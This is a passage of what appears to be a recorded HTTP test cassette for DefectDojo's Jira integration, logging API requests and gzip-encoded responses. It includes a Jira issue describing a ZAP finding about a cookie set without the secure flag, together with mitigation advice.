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 + headers: + ATL-TraceId: + - f3ebe62ab0146897 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:37 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 4147329d-5ed3-4860-84de-574f554fac42 + x-envoy-upstream-service-time: + - '158' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - 2252e1c5458204d9 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:37 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 42559bf6-2098-41ad-805d-32fd599ea044 + x-envoy-upstream-service-time: + - '72' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"description": "\n\n\n\n\n\n*Title*: [Jira Api Test 3|http://localhost:8080/finding/383]\n\n*Defect + Dojo link:* http://localhost:8080/finding/383\n\n*Severity:* Low \n\n*CWE:* + [CWE-614|https://cwe.mitre.org/data/definitions/614.html]\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [1st Quarter Engagement|http://localhost:8080/engagement/1] + / [ZAP Scan|http://localhost:8080/test/110]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n*Mitigation*:\nWhenever a cookie contains sensitive + information or is a session token, then it should always be passed using an + encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n*Defect + Dojo ID:* 383\n\n*Reporter:* [(admin) ()|mailto:]\n", "priority": {"name": "Low"}, + "summary": "Jira Api Test 3"}, "update": {}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1644' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: PUT + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10607 + response: + body: + string: '' + headers: + ATL-TraceId: + - a31f872b1d66f9e9 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:37 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - fa2fac17-82ce-4066-86d0-0339b14366ce + x-envoy-upstream-service-time: + - '90' + status: + code: 204 + message: No Content +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10607 + response: + body: + string: !!binary | + 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 + AAA= + headers: + ATL-TraceId: + - b1ca878cc9b140a7 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:41 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d594ad87-7304-4f4e-aed8-69d5008d6c43 + x-envoy-upstream-service-time: + - '139' + status: + code: 200 + message: OK +- request: + body: '{"transition": {"id": 41}, "fields": {}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '40' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-455/transitions + response: + body: + string: '' + headers: + ATL-TraceId: + - 6945be83f4f17dca + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:41 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 54f87614-f446-4851-9772-34c8a3fcbb9c + x-envoy-upstream-service-time: + - '274' + status: + code: 204 + message: No Content +- request: + body: '{"issueKeys": ["10607"], "ignoreEpics": true}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '45' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: PUT + uri: https://defectdojo.atlassian.net/rest/greenhopper/1.0/epics/333/add + response: + body: + string: '{"errorMessages":["Issue does not exist or you do not have permission + to see it."],"errors":{}}' + headers: + ATL-TraceId: + - 57c92e809c768670 + Connection: + - close + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:41 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 129762cd-7854-484c-84b9-334528b54585 + x-envoy-upstream-service-time: + - '27' + status: + code: 400 + message: Bad Request +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uutt1JmnS3uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7coUKRnk/KltYDCQj37j40dkIUwBaQAF5s799bR5e2ut2v05d + nIh8S1AGGbxnZMDZuOOENrTHGeOBO+PWIYa6dTTDb4TIFBD8Yt6rkEAGjObAcla1lEq2lSUvAOAG + IhzzHpfY247TlS1zoC0DybnkZSEE/2P76dFqF0FeCbHVVGtEvqtrrXjSqOiWVWLHomCir6v6X0Ew + qeFpXBRJ72i1mvDsepXsEzGXiaD9ODTkfP4BAAD//wMAvhQqCloBAAA= + headers: + ATL-TraceId: + - 4f10713b5f691671 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:43 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - dab05587-f4e4-4eb3-bf31-db0a62d3b1b7 + x-envoy-upstream-service-time: + - '32' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + 